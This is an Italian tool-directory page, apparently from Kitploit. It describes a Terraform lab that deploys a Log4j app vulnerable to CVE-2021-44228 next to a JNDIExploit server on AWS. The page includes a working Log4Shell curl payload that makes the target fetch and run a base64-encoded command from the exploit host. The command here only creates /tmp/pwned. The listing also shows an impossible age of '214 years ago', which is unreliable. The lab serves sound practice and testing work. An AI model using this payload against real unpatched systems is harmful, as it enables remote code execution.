Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
log4j-vulnerable-app-cve-2021-44228-terraform — Una configurazione Terraform per distribuire un'app vulnerabile e un JDNIExploit per lavorare con CVE-2021-44228. | Kitploit
Strumenti/GitHubGitHub/mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform
Sicurezza dell'Infrastruttura CloudGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubmkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform

log4j-vulnerable-app-cve-2021-44228-terraform

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Una configurazione Terraform per distribuire un'app vulnerabile e un JDNIExploit per lavorare con CVE-2021-44228.

Vedi Repository
214 anni faNon ancora revisionato

log4j-vulnerable-app-cve-2021-44228-terraform

Una configurazione Terraform per distribuire un'app vulnerabile e un JNDIExploit per lavorare con CVE-2021-44228

Informazioni sullo Stack

Questa configurazione Terraform crea due istanze in una VPC in AWS Cloud.

Devi solo esportare le tue AWS_ACCESS_KEY_ID e AWS_SECRET_ACCESS_KEY

Un'istanza è JNDIExploit.

La seconda è una Vulnerable-App per l'exploit di log4j

Sostituisci la tua chiave pubblica SSH nel codice Terraform prima dell'apply

root@kitploit:~
terraform init
terraform plan
terraform apply --auto-approve

Exploit

Dopo la distribuzione su AWS puoi sfruttarla con una richiesta curl e verificare la creazione del file in /tmp nel container vulnerable-app.

root@kitploit:~
curl ${vulnerable-app-IP}:8090 -H 'X-Api-Version: ${jndi:ldap://${JNDIExploit-IP}:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

Sul server dell'app vulnerabile esegui il seguente comando per verificare l'esecuzione del comando; dovresti vedere il file pwned.

root@kitploit:~
sudo docker exec -ti vulnerable-app ls /tmp
Scarica lo strumento